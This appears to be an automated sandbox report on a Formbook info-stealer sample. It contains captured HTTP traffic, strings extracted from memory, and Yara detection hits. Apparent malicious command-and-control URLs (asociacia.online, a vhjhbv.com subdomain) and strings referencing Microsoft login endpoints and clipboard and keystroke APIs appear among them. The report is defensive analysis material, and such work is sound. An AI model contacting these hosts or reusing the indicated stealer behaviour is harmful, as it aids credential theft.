69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 10:43:41 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 10:43:43 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 10:43:46 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound">
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 10:43:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 10:43:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 10:43:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 10:43:59 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: qvXzWppcWJ.exe, 00000009.00000002.3363834268.0000000004A9B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.asociacia.online
            Source: qvXzWppcWJ.exe, 00000009.00000002.3363834268.0000000004A9B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.asociacia.online/jsqu/
            Source: write.exe, 00000008.00000002.3364123267.0000000005CF8000.00000004.10000000.00040000.00000000.sdmp, qvXzWppcWJ.exe, 00000009.00000002.3362095361.0000000002D08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://6329.vhjhbv.com/4i87/?rtR8=tX1gPPm4vGDAfdGb/LV0WNIl4Jkrf3fdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgv
            Source: write.exe, 00000008.00000003.2747036161.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: write.exe, 00000008.00000003.2747036161.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: write.exe, 00000008.00000003.2747036161.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: write.exe, 00000008.00000003.2747036161.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: write.exe, 00000008.00000003.2747036161.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: write.exe, 00000008.00000003.2747036161.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: write.exe, 00000008.00000003.2747036161.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: write.exe, 00000008.00000002.3364123267.0000000005E8A000.00000004.10000000.00040000.00000000.sdmp, qvXzWppcWJ.exe, 00000009.00000002.3362095361.0000000002E9A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
            Source: write.exe, 00000008.00000002.3357490643.0000000003374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: write.exe, 00000008.00000003.2743318675.0000000008224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: write.exe, 00000008.00000002.3357490643.0000000003374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: write.exe, 00000008.00000002.3357490643.0000000003374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: write.exe, 00000008.00000002.3357490643.000000000339B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033/f?
            Source: write.exe, 00000008.00000002.3357490643.0000000003374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: write.exe, 00000008.00000002.3357490643.0000000003374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: write.exe, 00000008.00000002.3357490643.0000000003374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: write.exe, 00000008.00000003.2747036161.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: write.exe, 00000008.00000003.2747036161.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.3363834268.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3354933145.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2563421707.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2563714383.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2564107647.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3361592338.0000000004D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3361654877.0000000004DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3360961972.0000000002E00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3363834268.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3354933145.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2563421707.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
